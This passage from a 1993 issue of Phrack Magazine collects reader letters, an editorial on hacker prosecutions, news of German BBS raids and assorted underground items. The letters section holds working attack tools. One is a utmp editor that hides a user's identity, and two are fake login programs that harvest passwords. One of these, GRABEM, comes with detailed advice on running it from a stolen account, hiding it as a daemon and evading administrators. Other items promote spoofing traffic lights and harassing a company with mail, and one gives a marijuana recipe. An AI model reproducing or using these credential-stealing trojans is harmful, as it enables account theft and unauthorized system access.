==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2a of 14

[-=:< Phrack Loopback >:=-]

============================================================================
       !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
============================================================================

I 'found' this little C program a few days ago, and it runs on most UNIX machines I think (as I found it, I can't claim fame for writing it!).

What it does is change your userid and x25 address to anything of your choice. This only affects programs such as 'write' and 'who'. It doesn't automatically give you different access rights, so it can only be used to disguise your real identity.

Usage
-----
        inv god somewhere     (Changes your uid to 'god' and X.25 to 'somewhere')
        inv '' ''             (Makes you INVISIBLE on 'who')

Program invis.c
---------------

#include
#include
#include
#include

main(argc,argv)
int argc;
char *argv[];
{
        FILE *f;
        struct utmp u;

        int v=ttyslot(1);
        if(v==-1)
        {
         fprintf(stderr,"Can't find terminal.\n");
         exit(1);
        if(argc!=3)
        {
         fprintf(stderr,"Args!\n");
         exit(1);
        }
        f=fopen("/etc/utmp","r+");
        if(f==NULL)
        {
         fprintf(stderr,"Utmp has escaped!\n");
         exit(1);
        }
        if(fseek(f,v*sizeof(u),0)==-1)
        {
         fprintf(stderr,"Garbage utmp\n");
         exit(1);
        }
        if(fread((char *)&u,sizeof(u),1,f)!=1)
        {
         fprintf(stderr,"Write failed\n");
         exit(1);
        }
        strncpy(u.ut_name,argv[1],8);
        strncpy(u.ut_host,argv[2],16);
        if(fseek(f,v*sizeof(u),0)==-1)
        {
         fprintf(stderr,"Seek failed\n");
         exit(1);
        }
        fwrite((char *)&u,sizeof(u),1,f);
        fclose(f);
}

I personally have not used this program (to hack or for anything else)
What you do with it is up to you....,

Have fun....,

        ( Alas, life is but an Aardvaark.. )

        CHEERS THEN

-------------------------------------------------------------------------------

I am interested in getting in contact with hackers in North Italy (I am located in Torino). Do you know anybody? Can you help TheNewHacker??

Thanks

TheNewHacker

[Editor: Actually, we are in the process of recruiting people to write for a compilation file on the hacking scenes in countries around the world. One person is working on Italy. Perhaps when this file is completed, you will be able to network through that information.

If anyone in a country other than America is interested in contributing to this effort, please write us at: phrack@well.sf.ca.us ! ]

-----------------------------------------------------------------------------

hello, i must say i love your publication. I have a little kind of hack/phreak for you guys.

When you approach a Red light, preferably at night with few cars around, continually flash your bright lights. This tricks the light into believing this is a cop waiting behind traffic at the light thus changing the light after about 10 flashes. I discovered that after seeing several police officers turn on their lights before they hit lights and was amazed on how easily the light changed. If you have say, a Mag-lite the trick works if you point directly at the top of the post-light and the ones hanging right above red on verticals and right above yellow on horizontals.

hope this helps etc. (i fucking hate those damn red lights)

Dave.

[Editor: I've actually tried this. It works on most major intersections]

-----------------------------------------------------------------------------

Hallo !
I'd like to make just some addition to the APPENDIX A of the Racketeer's article "The POWER of Electronic Mail" - there are new guys in InterNET -> Russians (!). They have the awful connection, but it's cool team. So, add :

        .su     kremvax.hq.demos.su

And one more note, in the SMTP installed on the Sun Station I'm working on there isn't command TICK, but exist some strange like RSET and EXPN.

Spy

P.S. Sorry for my bad English.

[Editor: Russia has a lot of computers online these days. Look for more on the Russian Internet in upcoming Phracks!]

-----------------------------------------------------------------------------

There is another, much simpler way to expand your password collection, other than tty spoofing. Why not just run a program that simulates the login process, and then leave it running on the console for an unsuspecting victim? A simple example is below. Execute by typing getpass:logout.

--------File: getpass----------
LOGIN=""
PASSWD=""
clear
echo -n "login: "
read LOGIN
echo "$LOGIN" >name
sleep 3
echo -n "Password:"
read PASSWD
echo "$PASSWD" >password
echo
echo -n "Login incorrect"
-------------------------------

The only problem I have is that I don't know how to make it so that the password, when entered, isn't shown on the screen. I'm sure you can come up with a solution.

[Editor: actually, someone kinda did. See the next letter]

-----------------------------------------------------------------------------

A Better UNIX Password Grabber
by The K-Man

I blame it entirely on boredom. Well, that and an acute case of end-of-semester neural gridlock. I was sitting in the lab a couple of years ago, my head leaning against a Sparc-2 display, my index finger hitting the return key over and over again at the login prompt. It was all my mind and body were capable of at the time.
Then a little thought formed in the back of my mind: "You know, it would be pretty damn easy to write a program to imitate the behavior of this screen while grabbing user id's and passwords." So I logged in and started coding. Then I thought to myself, "You know, with a few extra lines of code and a couple of tricks, I could make this little guy almost completely undetectable and untraceable while running." So I coded some more. A couple of hours later, out popped the following program:

---------------------------- Cut Here -----------------------------------

/*----------------------------------------------------------------------+
| GRABEM 1.0 by The K-Man                                               |
| A Cute little program to collect passwords on the Sun workstations.   |
+----------------------------------------------------------------------*/

#define PASSWORD "Password:"
#define INCORRECT "\nLogin incorrect"
#define FILENAME ".exrc%"

#include
#include

/*-----------------------------------------------------------------------+
| ignoreSig                                                              |
|                                                                        |
| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.                   |
+-----------------------------------------------------------------------*/
void ignoreSig ()
{
    return;
}

/*-----------------------------------------------------------------------+
| Main                                                                   |
+-----------------------------------------------------------------------*/
main()
{
    char name[10],          /* users name                       */
         password[10];      /* users password                   */
    int  i,                 /* loop counter                     */
         lab,               /* lab # you're running on          */
         procid;            /* pid of the shell we're under     */
    FILE *fp;               /* output file                      */

    /*-------------------------------------------------------------------+
    | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
    | signals so the program doesn't stop and dump back to the shell.    |
    +-------------------------------------------------------------------*/
    signal (SIGINT, ignoreSig);
    signal (SIGTSTP, ignoreSig);
    signal (SIGQUIT, ignoreSig);

    /*-------------------------------------------------------------------+
    | Get the parent pid so that we can kill it quickly later. Remove    |
    | this program from the account.                                     |
    +-------------------------------------------------------------------*/
    procid = getppid();
    system ("\\rm proj2");

    /*-------------------------------------------------------------------+
    | Ask for the lab # we're running on. Clear the screen.              |
    +-------------------------------------------------------------------*/
    printf ("lab#: ");
    scanf ("%d", &lab);
    for (i=1; i<40; i++)
        printf ("\n");
    getchar();

    /*-------------------------------------------------------------------+
    | Outer for loop. If the name is <= 4 characters, it's probably not  |
    | a real id. They screwed up. Give 'em another chance.               |
    +-------------------------------------------------------------------*/
    for(;;)
    {
        /*---------------------------------------------------------------+
        | If they hit return, loop back and give 'em the login again.    |
        +---------------------------------------------------------------*/
        for (;;)
        {
            printf("lab%1d login: ",lab);
            gets (name);

            if (strcmp (name, "") != 0)
                break;
        }

        /*---------------------------------------------------------------+
        | Turn off the screen echo, ask for their password, and turn the |
        | echo back on.                                                  |
        +---------------------------------------------------------------*/
        system ("stty -echo > /dev/console");
        printf(PASSWORD);
        scanf("%s",password);
        getchar();
        system ("stty echo > /dev/console");

        /*---------------------------------------------------------------+
        | Write their userid and password to the file.                   |
        +---------------------------------------------------------------*/
        if ( ( fp = fopen(FILENAME,"a") ) != NULL )
        {
            fprintf(fp,"login %s has password %s\n",name,password);
            fclose(fp);
        }

        /*---------------------------------------------------------------+
        | If the name is bogus, send 'em back through                    |
        +---------------------------------------------------------------*/
        if (strlen (name) >= 4)
            break;
        else
            printf (INCORRECT);
    }

    /*-------------------------------------------------------------------+
    | Everything went cool. Tell 'em they fucked up and mis-typed and    |
    | dump them out to the REAL login prompt. We do this by killing the  |
    | parent process (console).                                          |
    +-------------------------------------------------------------------*/
    printf (INCORRECT);
    kill (procid, 9);
}

---------------------------- Cut Here -----------------------------------

HOW IT WORKS

You can probably figure this out by reading the code, but I thought I'd just add some comments on why I did what I did.

The first thing it does is install the signal handler. All it does is trap SIGINT, SIGTSTP, and SIGQUIT, so that the person trying to log into the machine this baby is running on can't kill it with a keystroke. Next, it gets the parent process ID. We'll use this later to kill it off quickly. Then it proceeds to erase the executable file. Sysadmins can't find a trojan horse program that isn't there.

From here it goes on to imitate the login and password prompts. You'll probably have to change the code to get it to imitate the login process on your particular machine.

When it gets a userid and password, it appends them to an existing file in the account. I chose the .exrc, but any dot file will work. The point being to use a file that already exists and should be in the account. Don't leave any extra suspicious files lying around.

After it writes the uid and password to the file, it bumps the user back to the real login prompt by killing off the shell that was the parent process of the program.
The cut is almost instantaneous; the user would have to be inhumanly observant to notice the transition.

HOW TO USE

Well, first you need an account to run it from. If your site has guest accounts, you've got it made. If not, I'd suggest using a little social engineering to get one other person's account. With that account and the program, you can grab access to many more. I wouldn't recommend running it from an account that has your name on it. That just makes it a little more dangerous than it needs to be. Of course, if the sysadmin happens to catch the program running on your login, you can always claim to know nothing. Say someone else must have gotten your password and is using your account to escape detection. He might buy it. But if you have the source for the program sitting somewhere in your account, and they find it, you're fucked. So it's best to use someone else's account for the job.

After you've gotten the account you'll be running it from, you'll need to get the program in that account somehow. I started off by keeping a copy of the source somewhere in my account, named with something innocuous and hidden among bunches of source files, but I got paranoid and started hauling the source around with me on a bar floppy. Do whatever suits your level of paranoia.

Copy the source to the account you'll be running it from and compile it. Trash the source, and name the program something that won't stand out in a ps list. selection_svc is a nice innocuous name, and it appears everywhere. Do a ps on one of your machines and look for processes that hang around for a long time. You might want to hide it as a daemon. Be creative.

Now run the program and sit back and wait. Or leave and come back later. When you know that someone has tried to log on to your booby trapped machine, log back into the account you borrowed to run the program in and vi or emacs (if you're that kind of person) out the captured userid and password. Simple as that.
Note that the two times that you stand the greatest chance of being caught are when you first compile and run the program and when you retrieve your captured uid and passwords. There's the remote chance that someone might see you at work and see what you're doing, but it's not very likely. If you start acting all paranoid you'll draw more attention to yourself than you would have gotten in the first place. If your site has dialup lines, you might want to do a dialin to retrieve the passwords. Or you might prefer to do it in person. All depends on your paranoia quotient which you think is more secure, I guess.

TIPS

Be careful which dot files you use. I chose the .exrc because it was something that wasn't used often at our site. If you chose the .cshrc or other frequently accessed file, put a # before the uid and password you write to that file. That way, when that dot file is sourced, it'll treat that line as a comment and not spit out an error message that could cause suspicion.

Try to run the program at a time when you know there will be heavy machine usage. That way you'll trap something quick. The longer your program runs, the greater the chance it will be found.

Don't be greedy. Run on only one or two machines at a time. And if you run on more than one machine, run out of a different account on each one. Again, the more you put out there, the better the chance that at least one will be found.

PARTING NOTE

The morning after I wrote this program was the first time I got to use it. I set it running on a guest account, then went to a machine across the room to do some legitimate work. One of my friends walks in shortly after that, and we start shooting the shit. A minute or two later, the sysadmin walks in, sits down, and logs in to the machine I ran the program on. I came really close to dropping my fudge right then and there. The only thing running through my mind was "Either I'm totally fucked, or I have root." Turned out it was choice B.
Too bad the guy changed his password once a week, and I wasn't smart enough to fix it so that I would see the change. Oh well, I had fun for a week though. There were quite a few interesting e-mail messages sent back and forth that week. I think the best one was the one from our (male) department head to one of our radical she-male hard-core no-damn-gifs feminist female professors, detailing all the perverted sexual acts that he would like to perform with and on her. :)

Anyway, have fun with the program. Maybe I'll get a chance to come up with some more cool UNIX programs in the future.

Later,

K-Man

-----------------------------------------------------------------------------

In a recent issue of PHRACK you had some article or loopback about getting information about people via modem. I am somewhat interested in this and could use this information. I have a friend who is a part-time bounty hunter and could use such information to track people down. Could you please send me some information about who to contact to find out this information. What I could REALLY use is an on-line up-to-date phone/address book that I could call to find out anybody's address. Is there such a thing? If you have any information please e-mail me, since I am unable to get your mag on a regular basis.

Thanx a mil!

Scarface

[Editor: Actually there are quite a large number of databases that keep information on everyone. There is TRW, Equifax, TransUnion, Information America and NAI just to name a few. Many of these services are very expensive, but even services like CompuServe allow users to look up people all over America using PhoneFile which compiles data from all kinds of public records. Nexis can allow you to look up real estate data on just about anyone with loans on their houses. Every public utility and department of motor vehicles provides information on their records, and many are online.
A good book to read about this kind of thing is

        Privacy For Sale
        Jeffrey Rothfeder
        Simon & Schuster
        $22.00]

-----------------------------------------------------------------------------

THE GOLDEN ERA REBORN!

Relive the thrill of the golden era of hacking through our exclusive collection of BBS messages. Our collection contains posts from over 40 of the most popular hack/phreak BBSes of all time.

Experience the birth of the computer underground again from your own computer with this collection of original posts from bulletin boards like:

        * 8BBS *
        * OSUNY *
        * PLOVERNET *
        * THE LEGION OF DOOM *
        * BLACK ICE PRIVATE *
        * THE PHOENIX PROJECT *

And many more...

Messages are available in many computer formats:

        IBM
        Amiga
        Macintosh

For more information, please contact

        LOD Communications
        email: lodcom@mindvox.phantom.com

        US Mail:
        LOD Communications
        603 W. 13th St.
        Suite 1A-278
        Austin, TX 78701

        Voice Mail: 512-448-5098

-----------------------------------------------------------------------------

You might like this one...

--bob

****************************************

I just saw a transcript of a press conference given by Secret Service Agent Frericks, in Lubbock last December. here is a brief extraction...

FRERICKS: Um hm. This is a major nation wide, world wide problem from an industry point of view with tremendous losses in funds tremendous losses of money. the VAX account at the University is a way to get into numerous other research accounts or Internet which is the ...you get onto Internet you can talk to anybody else who is on Internet anywhere in the world which these kids were talking to Belgium, and Israel and Australia and they can do that just by this, thus avoiding long distance phone calls.
But most of the people on Internet I mean on the VAX are there legitimately for research purposes they can go to Mayo and get a file if they're a med student and they also get one of these pamphlets if they get, like the Department of Engineering gives out an account number just for that semester, the professor would give it out so you can use the VAX well they also get one of those pamphlets that explains what the rules are and the instructor spends a good bit of time the first couple of classes going over computer etiquette, computer rules.

[Editor: Another of America's finest.]

-----------------------------------------------------------------------------

I typed this because of the mention of Software Security International in the article "More than $100,000 in Illegal Software Seized" in Rambone's Pirates Cove in Phrack 41.

He mentioned that they were the investigators that finally brought down APL. I am not only familiar with that, a past friend of mine was there when the Marshals took the board. He was there as representative of SSI.

The best part that Rambone didn't know, was that they couldn't get into APL to verify the existence of the software, until they got the password breaker from Novell. So in essence, they looked like some dumb fools. They didn't have any idea on how to approach the network.

Software Security International can be reached at...

        1-800-724-4197

        2020 Pennsylvania Avenue N.W.
        Suite 722
        Washington, D.C. 20006-1846

That is of course if they finally have gotten off the ground. Last I heard (2-3 months ago) they were still having trouble getting Financial Backing. They did the APL Bust for nothing, just to prove they could do it. They are also on a lot of other BBS's around America. So as a warning to other sysops, Cover your Ass.

You could rack up some serious negative cash flow by sending tons of mail to the box above, then it gets Airborne'd to Washington State.
see ya

[Editor: I think it might be a good idea to send them a few postcards every day for the next few weeks. Just to stay in touch.]

-----------------------------------------------------------------------------

==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2b of 14

[-=:< Editorial >:=-]

Before I jump upwards onto my soapbox and spew forth a meaty editorial I would like to relay something to the readers of Phrack. The following is a transcript of John Lee's (Corrupt's) confession to the charges facing him. (From Security Insider Report, Jan. 1993)

What follows is in my opinion a very poor attempt at a plea-bargain, and obviously induced by attorney coercion. I must wonder what John was thinking when he agreed to this admission.

======================================================================

I agreed with others to violate various laws related to the use of computers. I agreed to do the following:

1) I agreed to possess in excess of fifteen passwords which permitted me to gain access to various computer systems including all systems mentioned in the indictment and others. I did not have authorization to access these systems. I knew at the time that what I did was wrong.

2) I used these access devices and in doing so obtained the value of time I spent within these systems as well as the value of the passwords themselves which I acknowledge was more than $1000.

3) I intentionally gained access to what I acknowledge are Federal interest computers and I acknowledge that work had to be done to improve the security of these systems which was necessitated by my unauthorized access.

4) I was able to monitor data exchange between computer systems and by doing so intentionally obtained more passwords, identifications and other data transmitted over Tymnet and other networks.
5) I acknowledge that I and others planned to share passwords and transmitted information across state boundaries by modem or telephone lines and by doing so obtained the monetary value of the use of the systems I would otherwise have had to pay for.

Among the ways I and others agreed to carry out these acts are the following:

1. I was part of a group called MOD.

2. The members of the group exchanged information including passwords so that we could gain access to computer systems which we were not authorized to access.

3. I got passwords by monitoring Tymnet, calling phone company employees and pretending to be computer technicians, and using computer programs to steal passwords.

I participated in installing programs in computer systems that would give the highest level of access to members of MOD who possessed the secret password.

I participated in altering telephone computer systems to obtain free calling services such as conference calling and free billing among others.

Finally, I obtained credit reports, telephone numbers and addresses as well as other information about individual people by gaining access to information and credit reporting services. I acknowledge that on November 5, 1991, I obtained passwords by monitoring Tymnet.

I apologize for my actions and am very sorry for the trouble I have caused to all concerned.

John Lee

==========================================================================

This issue I would like to call attention to what I consider to be a very pressing issue. There has always been a trend to pad the amount of dollar damages incurred to any victim of a hacker attack. I personally feel that the blame is never directed at the true guilty parties.

Certainly, if someone is caught breaking into a system, then they are surely guilty of some form of electronic trespass. I will also concede that such a person may or may not be guilty of other crimes based upon their actions once inside that system.
What I have the most problems dealing with is the trend to blame the hacker for any expenditures needed to further secure the system.

With this mindset, why should any corporation bother to add any security at all? Why not just wait until someone happens across a few poorly secured sites, nab them, and claim damages for the much needed improvements in security?

The worst culprits in this type of behavior have been the RBOCs. As was seen with the supposed damages incurred for the distribution of the "911 document" and most recently with the $370,000 damages supposedly incurred by Southwestern Bell resulting from the alleged activities of those in MOD.

Perhaps this figure does have some basis in reality, or perhaps it is just an arbitrary figure dreamed up by a few accountants to be used at year end to explain some losses in the corporate stock report. Most often figures such as this factor in such ridiculous items as the actual system hardware penetrated. I can hardly see the relevance of such a charge.

Even if these charges are to be believed, why isn't the blame being evenly distributed? Why aren't stockholders crying for the heads of system administrators, MIS managers and CIOs? These are the people who have not adequately done their jobs, are they not? If they had expended a bit of time, and a small amount of capital, the tools exist to make their systems impervious to attack. Period.

If I had an investment in a company such as Southwestern Bell, I would be outraged that the people I was employing to perform data security functions were not apt enough to keep a group of uneducated gangsters out of their switching systems. Why haven't there been any emergency meetings of shareholders? Why isn't anyone demanding any changes in policy? Why is everyone still employed?

Not to blame Southwestern Bell too harshly, they were sorely outclassed by MOD, and had absolutely no way to cope with them.
Not only because MOD were competent telco hackers, but because Southwestern Bell's network service provider had given them free rein.

Southwestern Bell's packet switched network, Microlink II, was designed and implemented for SWBT by Tymnet (then owned by McDonnell Douglas). An interesting thing I've heard about SWBNET, and about every other subnet arranged by Tymnet, is that the information concerning gateways, utilities, locations of node code, etc., is purported to be located in various places throughout Tymnet internal systems. One such system was described to me as a TYMSHARE system that contained data files outlaying every subnet on Tymnet, the mnemonics (username/password pair) to each utility, gateway, and the ONTYME II mail access keys.

If this information is correct, then shouldn't Tymnet be called in to acknowledge their role in the attacks on Southwestern Bell?

Let's say a Realtor sold you a house, but told you that he would be keeping copies of all your keys so that he could help you with the maintenance. Some time later, you notice that a few of your books have been read, but nothing else is disturbed. Later on you notice that your tv is on and your bed is all messed up. A week later your stereo is gone. You set up a trap and catch someone going into your house with your own key! You find that the burglars had made copies of all the keys held by your Realtor. You then find that the Realtor neglected to put the keys in a safe, and in fact had left them lying around on the table in his back yard labeled with the addresses they corresponded to.

Who would you be more upset with? The individual who copied and used the keys, or the Realtor for not providing the access to your valuables more vigilantly? I would personally be far more upset with the Realtor, for if he had put the keys in a safe this event would have probably never transpired.
I'm not saying that people who get caught for breaking into computer systems should be let go, especially if they can be proven to be involved in the sale of hacked information for a personal profit. What I am saying is that if hackers are to be punished so vigorously for what I view as a predominantly victimless crime, then everyone should have to line up and take their fair share of the blame.

I think it's high time that the real blame be placed on the corporate entities who seemingly refuse to acknowledge their role in these break-ins. Neglect of duties and lack of responsibility on the part of the employees, the interconnect carriers, the data network providers, the hardware vendors, etc. all play a key role in the problems that exist in the world's data networks today. In fact, if it were not for computer hackers, these problems would continue to lie dormant until either discovered by accident in the field, or the provider decided to go ahead and illuminate its clients to the existence of such a problem.

I wholeheartedly encourage each and every reader of Phrack to purchase one share of stock in any corporation you know that has exhibited such tendencies and take your place on the floor of the next shareholders meeting and scare the hell out of the board of directors.

Phrack Magazine is calling a discount brokerage very soon.

-------------------------------------------------------------------------------

==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2c of 14

******************************************************************************

BBS Busts in Germany
====================

Thursday, March 18, 1993.

This day will be remembered as a black day in German BBS history. In fact, it was the blackest day in German BBS history since the raid of 18 Berlin BBS in Berlin and North Germany a couple of months ago.

What has happened?
A couple of Bulletin Board Systems (BBS) have been raided by the police. All these BBS had "warez" online, illegal, pirated, copyrighted Software - usually for PC/MSDOS and Amiga. This time, most of these BBS were in Bavaria, South Germany.

Now let's take a closer look at the events:

One guy who got busted was MST, Sysop of Southern Comfort BBS in Munich. In fact, his board went offline 9 days before. But he was so unlucky still having his computer and his warez. He was even using his modem to trade warez at the very moment the cops rang his doorbell. Why did he go offline just so short before he got busted? His board had been running for over 1 year.

Here is the text file MST released about going offline:

        THURSDAY 03-09-93 00:15

        THE SOUTHERN COMFORT BBS IS CLOSED !
        I AM NOT BUSTED OR ANYTHING LIKE THIS !
        I CLOSED THE BBS COS OF PERSONAL REASONS AND PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
        I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE IS NOT ALL WHAT LIFE CAN BE
        ALL USER ACCOUNTS STAY ALIVE AND WILL BE HERE AT A NEW??? OPENING !
        SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !

        MST/RAZOR 1911

A couple of days later, MST was posting ads in local BBS to sell his old equipment. But obviously he wasn't fast enough. Maybe this was one of the reasons the cops busted him on March 18. They were afraid he might get rid of his illegal software, so they hurried up to catch him!

He got busted at 10am this morning. Three cops were knocking on his door, until he opened. They had a search warrant and confiscated all his computer equipment, disks, modems...

Chris used to have a board until four months ago, and now trades for TDT and other groups. He was in school this morning. His parents weren't home either. So the cops broke into his house, smashed the wooden door, and seized all his equipment. He is asked to speak to the Police this Tuesday. Chris used to be one of the most active traders for PC warez in Germany.
He and his friend Michelangelo supported boards like Schizophrenia and Beverly Hills, which they co-sysop'ed. They were also known as the 'Beverly Hills Boys', a new German cracking group.

After Chris' bust, a couple of boards were affected: Beverly Hills went offline. Also the German Headquarters of the Beverly Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least 1-3 months offline time.

The other Munich BBS and their sysops were really scared after the bust and took down their systems for an uncertain amount of time.

One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for every warez collector. It had 8 modems hooked up (all US Robotics Dual Standard 16.8) and one ISDN Line. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which would be put online according to users' requests.

But then, March 18 arrived, and the dream was shattered. Its sysop, Rider, who was happily calling boards the previous day, had the most shocking experience in his life. The cops came and took his BBS.

And more.. Ego, co-sysop of a large German BBS, got busted. Andy/Spreadpoint (ex-sysop) got busted. And lots of others...

Unlike the US Secret Service, which delights in seizing all electronic equipment, like stereos, TVs, VCRs, the German cops were just after the computer hardware, especially the hard drives and file servers.

They usually come with three or four people. All of the search warrants they were using were quite old, issued last December.

Who is behind those actions? First of all the BSA, Business Software Association. They were also responsible for the recent raids of US Bulletin Boards. In Germany they just announced actions against piracy and bulletin boards. The most active BSA Members are Microsoft and Lotus Development. Microsoft, Lotus and the BSA are all located in Munich, Germany, home of Germany's most feared lawyer, Guenther Freiherr von Gravenreuth.
This guy has been fighting for years against piracy, young kids who copy games, and especially bulletin board systems. He is also affiliated with Ariolasoft, a huge German distributor for game labels like Activision and others.

In the end, all I can say is: Be aware, don't get caught and don't keep illegal stuff on your board!

(c) 1993 SevenUp for Phrack

******************************************************************************

Carlcory's brownies:

/* Begin cc_brownie.c */

Includes:
#include "4_squares_baking_chocolate"
#include "1_cup_butter"
#include "2_cups_sugar"
#include "4_eggs"
#include "2_cups_flour"
#include "2_tbs_vanilla"
#include "1_third_cup_marijuana" /*comment out if won't compile on your system*/
#include "1_cup_nuts" /*comment out if won't compile*/

void main(void);
{
    heat(oven, 350);
    add(butter, chocolate);
    while(texture!='smooth') {
        stir(mixture);
    }
    Add(sugar);
    add(eggs);
    add(vanilla);
    add(flour, pot);
    add(nuts)
    for(timer=0; timer<35; timer++) {
        bake(mixture);
    }
    cool(hour);
}

/*The high takes about an hour to come on, but lasts for 12 hrs. (4 brownies)
  Make sure they cool (don't burn your mouth!) and share with friends! */

/*End of cc_brownie.c*/

******************************************************************************

GRAY AREAS
Examining the Gray Areas of Life

Gray Areas, Inc.
P.O. Box 808
Broomall, PA 19008-0808
(215)353-8238
grayarea@well.sf.ca.us

Gray Areas is published quarterly and printed on recycled paper. They also participate in local recycling efforts involving cans, glass, clothing, newspapers, and more.

A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may purchase a twelve issue subscription and give 4 or 8 of those issues away as gifts to friends (i.e., the same 4 issues you receive would also go to 2 other recipients). Make check or money order out to Gray Areas, Inc.
STATEMENT OF PURPOSE:

Gray Areas exists to examine the gray areas of life. We hope to unite people involved in all sorts of alternative lifestyles and deviant subcultures. We are everywhere! We felt that the government has done a great job of splitting people up so that we do not identify with other minority groups anymore. There are so many causes now that we often do not talk to others not directly involved in our chosen causes. We believe that the methods used to catch criminals are the same regardless of the crime and that much can be learned by studying how crimes in general are prosecuted and how people's morals are judged. It is our mission to educate people so they begin to care more about the world around them. Please join our efforts by subscribing, advertising your business with us, and by spreading the word about what we're up to.

__________________________

Review by Knight Lightning:

I recently received a copy of the premier issue of Gray Areas, dated Fall 1992 and with a cover price of $4.50 (US). I was impressed with both the laser quality of the printing, artwork, and graphics, as well as the topics and content of the articles.

I would not characterize Gray Areas as a hacker magazine, but the subject did come up in an interview with John Perry Barlow (one of the original founders of the Electronic Frontier Foundation) where he discussed the EFF and its role in defending civil liberties.

No, instead I think it is safe to say that Gray Areas pays a lot of attention to the Grateful Dead. Indeed the cover story is titled "Grateful Dead Unauthorized Videos." Additionally, there are several other articles (including the John Barlow interview) that discuss varying aspects about the Dead's history, their politics, and of course their music. An advertisement for the next issue of Gray Areas reveals that even more articles relating to the Grateful Dead are on the way; so if you are a "Dead Head" you will probably fall in love with this magazine!
However, the article that I appreciated most was "Zine Scene," a review of 163 alternative newsletters that included such familiar names as 2600, Hack-Tic, Full Disclosure, and TAP; and others that I intend to take a look at like Iron Feather's Journal and bOING bOING. The zines reviewed here covered every topic imaginable and I thought it was a great buffet for the mind to have such a handy directory (especially since Factsheet Five went defunct about a year ago).

Other interesting articles had to do with video, audio, and software piracy and reviews of music and software. I also enjoyed the great artwork found throughout the magazine in the form of visual aids, comics, and advertisements.

If you are a fan of alternative music or the Grateful Dead, you'll be very sorry if you don't subscribe immediately. If you are interested in alternative publications with more interesting points of view than Time or Newsweek then you owe it to yourself to at least purchase a copy to check it out.

- - - - - - - - -

All letters sent to Gray Areas are presumed to be for publication unless you specifically request that they omit your name or refrain from publishing your comments. If you are writing about something which could incriminate yourself, they will protect your identity as a matter of policy.

******************************************************************************

"Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard"
by The Sausage with The Mallet

If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V32.bis 14.4k capability.

ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
atgw03c6,22gw05cd,2f
ats14=1s24=150s26=1s32=8s34=0x7&w

A very important item is the b1, which tells the modem to use the 16.8K HST protocol.
If you do not set b1, when the Sportster connects with another V32 modem it will go through the CCITT v.32 connect tones and you will not get a 16.8K connect.

If you do get an HST connect, you will not hear the "normal" train phase--instead you will hear the HST negotiation which sounds like a 2400 baud carrier.

Finally, if you change the "cd" in the second line to a "cb", your modem will think it is a V.32 Courier instead of an HST 16.8K.

Look for other pfine pfiles from Rancid Bacon Productions in conjunction with USDA Grade A Hackers (UGAH.) Accept no substitutes.

*******************************************************************************

Request to Post Office on Selling of Personal Information

In May 1992, the US Postal Service testified before the US House of Representatives' Government Operations Subcommittee that National Change of Address (NCOA) information filled out by each postal patron who moves and files that move with the Post Office to have their mail forwarded is sold to direct marketing firms without the person's consent and without informing them of the disclosure. These records are then used to target people who have recently moved and by private detective agencies to trace people, among other uses. There is no way, except by not filling out the NCOA form, to prevent this disclosure.

This letter is to request information on why your personal information was disclosed and what uses are being made of it. Patrons who send in this letter are encouraged to also forward it and any replies to their Congressional Representative and Senators.

Eligible requestors: Anyone who has filed a change of address notice with the Postal Service within the last five years.

Records Officer
US Postal Service
Washington, DC 20260

PRIVACY ACT REQUEST

Dear Sir/Madam:

This is a request under the Privacy Act of 1974 (5 USC 552a).
The Act requires the Postal Service, as a government agency, to maintain an accounting of the date, nature, and purpose of each disclosure of information about individuals. I request a copy of the accounting of all disclosures made of address change and mail forwarding information that I provided to the Postal Service. This information is maintained in USPS System of Records 010.010.

On or about (date), I filed a change of address notice requesting that my mail be forwarded from (old address) to (new address). The name that I used on the change of address form was (name).

This request includes the accounting of all disclosures made by the Postal Service, its contractors, and its licensees.

I am making this request because I object to the Postal Service's policy of disclosing this information without giving individuals an option to prevent release of this information. I want to learn how my information has been disclosed and what uses have been made of it. Please let the Postmaster General know that postal patrons want to have a choice in how change of address information is used.

If there is a fee in excess of $5 for this information, please notify me in advance. Thank you for consideration of this request.

Sincerely,

CC: Your Congressional Representative
    US House of Representatives
    Washington, DC 20510

    Your Senators
    US Senate
    Washington, DC 20515

-------------------------------------------------------------------------------